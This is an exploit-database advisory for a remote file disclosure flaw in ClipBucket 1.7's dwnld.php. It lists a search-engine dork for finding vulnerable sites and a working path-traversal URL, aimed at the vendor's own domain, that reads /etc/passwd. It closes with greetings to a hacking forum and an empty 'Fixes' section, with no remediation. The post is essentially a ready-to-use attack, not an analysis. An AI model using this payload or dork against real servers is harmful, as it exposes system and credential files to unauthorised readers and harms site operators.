ClipBucket 1.7 (dwnld.php file) Remote File Disclosure Vulnerability

2009-02-16 17:54:10

#########################################################################################
[!x!] Informations:

Name : vlinks
Download : http://clip-bucket.com/
Vulnerability : Remote File Disclosure Vulnerability
Author : JIKO(JAWAD)
Contact : [email protected]
Site : No-ExploiT.CoM/Forum (langague arabic)
Notes : 3arabi Muslim Maghribi (bladi blad lmgharba kamlin Dini Din lmsalmin Kamlin)
Dork : © Copyrights ClipBucket 2007 - 2009, PHPBucket Pvt Ltd
#########################################################################################
[!x!] Bug:

Bugged file is /[path]/dwnld.php

[Note]
Open the source For see The Code
[/Note]

#########################################################################################
[!x!] Exploit:
Demo
Exploit: http://clip-bucket.com/dwnld.php?file=../../../../etc/passwd

########################################################################################
[!x!] To: فلسطين الحرة
Cyber-Zone(Abdelkhalek) ,Hussin X ,leopard ,FrFoRHaCKeR ,ShBh BaGhDaD ,RoMyOoOo
members [No-exploit.Com]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.